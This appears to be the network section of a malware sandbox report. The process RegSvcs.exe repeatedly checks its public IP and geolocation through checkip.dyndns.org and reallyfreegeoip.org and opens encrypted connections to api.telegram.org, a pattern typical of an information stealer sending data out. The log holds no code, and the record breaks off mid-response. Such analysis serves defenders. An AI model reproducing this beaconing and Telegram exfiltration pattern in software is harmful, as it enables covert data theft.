                                                                                                  Jan 8, 2025 15:44:14.653877020 CET49718443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:14.654351950 CET49718443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:14.654365063 CET44349718188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:14.706842899 CET4971780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:15.140136003 CET44349718188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:15.142148972 CET49718443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:15.142184973 CET44349718188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:15.290838003 CET44349718188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:15.290901899 CET44349718188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:15.290954113 CET49718443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:15.291347980 CET49718443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:15.295063972 CET4971780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:15.296211958 CET4972080192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:15.299982071 CET8049717132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:15.300049067 CET4971780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:15.300981045 CET8049720132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:15.301042080 CET4972080192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:15.301491022 CET4972080192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:15.306265116 CET8049720132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:15.983721972 CET8049720132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:15.988147020 CET49723443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:15.988190889 CET44349723188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:15.988261938 CET49723443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:15.988507986 CET49723443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:15.988516092 CET44349723188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:16.034991980 CET4972080192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:16.444009066 CET44349723188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:16.452186108 CET49723443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:16.452200890 CET44349723188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:16.584253073 CET44349723188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:16.584323883 CET44349723188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:16.584803104 CET49723443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:16.589154959 CET49723443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:16.626176119 CET4972080192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:16.631156921 CET8049720132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:16.631206036 CET4972080192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:16.637808084 CET49726443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:16.637844086 CET44349726149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:16.638158083 CET49726443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:16.639329910 CET49726443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:16.639343977 CET44349726149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:17.249553919 CET44349726149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:17.249644995 CET49726443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:17.252474070 CET49726443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:17.252479076 CET44349726149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:17.252720118 CET44349726149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:17.254625082 CET49726443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:17.295334101 CET44349726149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:17.531357050 CET44349726149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:17.531424046 CET44349726149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:17.531735897 CET49726443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:17.536159992 CET49726443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:21.338947058 CET4975480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:21.343846083 CET8049754132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:21.343955994 CET4975480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:21.344120026 CET4975480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:21.348860025 CET8049754132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:22.028577089 CET8049754132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:22.032052040 CET4975480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:22.036942005 CET8049754132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:22.242522001 CET8049754132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:22.284959078 CET4975480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:22.285321951 CET49760443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:22.285358906 CET44349760188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:22.285495996 CET49760443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:22.291323900 CET49760443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:22.291347027 CET44349760188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:22.750050068 CET44349760188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:22.750150919 CET49760443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:22.772335052 CET49760443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:22.772355080 CET44349760188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:22.772644997 CET44349760188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:22.827064037 CET49760443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:23.065418959 CET49760443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:23.111345053 CET44349760188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:23.182949066 CET44349760188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:23.183005095 CET44349760188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:23.183059931 CET49760443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:23.186500072 CET49760443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:23.190187931 CET4975480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:23.195027113 CET8049754132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:23.401701927 CET8049754132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:23.403904915 CET49766443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:23.403959036 CET44349766188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:23.404181004 CET49766443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:23.404447079 CET49766443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:23.404459000 CET44349766188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:23.456845999 CET4975480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:23.874619007 CET44349766188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:23.876554012 CET49766443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:23.876575947 CET44349766188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:24.025563955 CET44349766188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:24.025619030 CET44349766188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:24.025684118 CET49766443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:24.026164055 CET49766443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:24.029853106 CET4975480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:24.031095982 CET4977280192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:24.034806967 CET8049754132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:24.034861088 CET4975480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:24.035872936 CET8049772132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:24.036075115 CET4977280192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:24.036158085 CET4977280192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:24.040893078 CET8049772132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:24.706125021 CET8049772132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:24.707609892 CET49778443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:24.707629919 CET44349778188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:24.707783937 CET49778443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:24.708028078 CET49778443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:24.708040953 CET44349778188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:24.753710032 CET4977280192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:25.183023930 CET44349778188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:25.185283899 CET49778443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:25.185305119 CET44349778188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:25.385087013 CET44349778188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:25.385143042 CET44349778188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:25.385425091 CET49778443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:25.385637999 CET49778443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:25.389944077 CET4978380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:25.394752979 CET8049783132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:25.394829988 CET4978380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:25.394895077 CET4978380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:25.399641037 CET8049783132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:26.121742010 CET8049783132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:26.122991085 CET49789443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:26.123030901 CET44349789188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:26.123095989 CET49789443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:26.123332977 CET49789443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:26.123343945 CET44349789188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:26.175616980 CET4978380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:26.604497910 CET44349789188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:26.606028080 CET49789443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:26.606055021 CET44349789188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:26.747402906 CET44349789188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:26.747464895 CET44349789188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:26.747867107 CET49789443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:26.748121023 CET49789443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:26.751363039 CET4978380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:26.752405882 CET4979580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:26.756905079 CET8049783132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:26.756975889 CET4978380192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:26.757261992 CET8049795132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:26.757332087 CET4979580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:26.757416010 CET4979580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:26.762162924 CET8049795132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:27.431449890 CET8049795132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:27.432766914 CET49801443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:27.432806015 CET44349801188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:27.432874918 CET49801443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:27.433131933 CET49801443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:27.433146000 CET44349801188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:27.472476006 CET4979580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:27.911875010 CET44349801188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:27.913472891 CET49801443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:27.913503885 CET44349801188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:28.073144913 CET44349801188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:28.073194027 CET44349801188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:28.073308945 CET49801443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:28.076894999 CET49801443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:28.080543995 CET4979580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:28.081692934 CET4980780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:28.085783005 CET8049795132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:28.085942030 CET4979580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:28.086488008 CET8049807132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:28.086558104 CET4980780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:28.086678028 CET4980780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:28.091435909 CET8049807132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:28.776391983 CET8049807132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:28.777627945 CET49810443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:28.777667999 CET44349810188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:28.778100967 CET49810443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:28.778361082 CET49810443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:28.778376102 CET44349810188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:28.816210032 CET4980780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:29.234083891 CET44349810188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:29.236058950 CET49810443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:29.236093044 CET44349810188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:29.389755964 CET44349810188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:29.389826059 CET44349810188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:29.390105963 CET49810443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:29.390368938 CET49810443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:29.393798113 CET4980780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:29.394881010 CET4981580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:29.399208069 CET8049807132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:29.399653912 CET8049815132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:29.399743080 CET4980780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:29.399751902 CET4981580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:29.399910927 CET4981580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:29.404652119 CET8049815132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:30.089771032 CET8049815132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:30.091140032 CET49819443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:30.091171026 CET44349819188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:30.091238976 CET49819443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:30.091546059 CET49819443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:30.091557026 CET44349819188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:30.144342899 CET4981580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:30.560388088 CET44349819188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:30.561856985 CET49819443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:30.561881065 CET44349819188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:30.694627047 CET44349819188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:30.695055962 CET44349819188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:30.695158005 CET49819443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:30.695421934 CET49819443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:30.698555946 CET4981580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:30.699537992 CET4982580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:30.704365969 CET8049825132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:30.704544067 CET4982580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:30.704711914 CET4982580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:30.706604004 CET8049815132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:30.706680059 CET4981580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:30.711678982 CET8049825132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:31.375387907 CET8049825132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:31.376686096 CET49830443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:31.376735926 CET44349830188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:31.376880884 CET49830443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:31.377103090 CET49830443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:31.377116919 CET44349830188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:31.425579071 CET4982580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:31.837018013 CET44349830188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:31.862883091 CET49830443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:31.862900972 CET44349830188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:31.982192039 CET44349830188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:31.982270956 CET44349830188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:31.982395887 CET49830443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:31.982872009 CET49830443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:31.985821009 CET4982580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:31.986886978 CET4983480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:31.990884066 CET8049825132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:31.991127014 CET4982580192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:31.991755009 CET8049834132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:31.995101929 CET4983480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:31.995208979 CET4983480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:31.999991894 CET8049834132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:32.513052940 CET4970780192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:32.812037945 CET8049834132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:32.813525915 CET49838443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:32.813575029 CET44349838188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:32.813724041 CET49838443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:32.814048052 CET49838443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:32.814065933 CET44349838188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:32.863142014 CET4983480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:33.268978119 CET44349838188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:33.270912886 CET49838443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:33.270951033 CET44349838188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:33.424360037 CET44349838188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:33.424423933 CET44349838188.114.96.3192.168.2.5
                                                                                                  Jan 8, 2025 15:44:33.424529076 CET49838443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:33.425029993 CET49838443192.168.2.5188.114.96.3
                                                                                                  Jan 8, 2025 15:44:33.434174061 CET4983480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:33.434959888 CET49844443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:33.435007095 CET44349844149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:33.435082912 CET49844443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:33.435611963 CET49844443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:33.435631990 CET44349844149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:33.439768076 CET8049834132.226.247.73192.168.2.5
                                                                                                  Jan 8, 2025 15:44:33.439831018 CET4983480192.168.2.5132.226.247.73
                                                                                                  Jan 8, 2025 15:44:34.041692019 CET44349844149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:34.041821957 CET49844443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:34.043317080 CET49844443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:34.043329000 CET44349844149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:34.043555975 CET44349844149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:34.044931889 CET49844443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:34.091345072 CET44349844149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:34.287908077 CET44349844149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:34.287991047 CET44349844149.154.167.220192.168.2.5
                                                                                                  Jan 8, 2025 15:44:34.288049936 CET49844443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:34.290657043 CET49844443192.168.2.5149.154.167.220
                                                                                                  Jan 8, 2025 15:44:48.782809973 CET4977280192.168.2.5132.226.247.73
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 8, 2025 15:44:04.752666950 CET4954053192.168.2.51.1.1.1
                                                                                                  Jan 8, 2025 15:44:04.759500027 CET53495401.1.1.1192.168.2.5
                                                                                                  Jan 8, 2025 15:44:05.746161938 CET5127753192.168.2.51.1.1.1
                                                                                                  Jan 8, 2025 15:44:05.754116058 CET53512771.1.1.1192.168.2.5
                                                                                                  Jan 8, 2025 15:44:16.625680923 CET6073853192.168.2.51.1.1.1
                                                                                                  Jan 8, 2025 15:44:16.632550955 CET53607381.1.1.1192.168.2.5
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Jan 8, 2025 15:44:04.752666950 CET192.168.2.51.1.1.10x6aa5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                  Jan 8, 2025 15:44:05.746161938 CET192.168.2.51.1.1.10x1a7bStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                  Jan 8, 2025 15:44:16.625680923 CET192.168.2.51.1.1.10xe99bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jan 8, 2025 15:44:04.759500027 CET1.1.1.1192.168.2.50x6aa5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Jan 8, 2025 15:44:04.759500027 CET1.1.1.1192.168.2.50x6aa5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                  Jan 8, 2025 15:44:04.759500027 CET1.1.1.1192.168.2.50x6aa5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                  Jan 8, 2025 15:44:04.759500027 CET1.1.1.1192.168.2.50x6aa5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                  Jan 8, 2025 15:44:04.759500027 CET1.1.1.1192.168.2.50x6aa5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                  Jan 8, 2025 15:44:04.759500027 CET1.1.1.1192.168.2.50x6aa5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                  Jan 8, 2025 15:44:05.754116058 CET1.1.1.1192.168.2.50x1a7bNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                  Jan 8, 2025 15:44:05.754116058 CET1.1.1.1192.168.2.50x1a7bNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                  Jan 8, 2025 15:44:16.632550955 CET1.1.1.1192.168.2.50xe99bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                  • reallyfreegeoip.org
                                                                                                  • api.telegram.org
                                                                                                  • checkip.dyndns.org
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.549704132.226.247.73804612C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 8, 2025 15:44:04.770581961 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 8, 2025 15:44:05.471961975 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:05 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 104
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                  Jan 8, 2025 15:44:05.476053953 CET127OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Jan 8, 2025 15:44:05.693861008 CET273INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:05 GMT
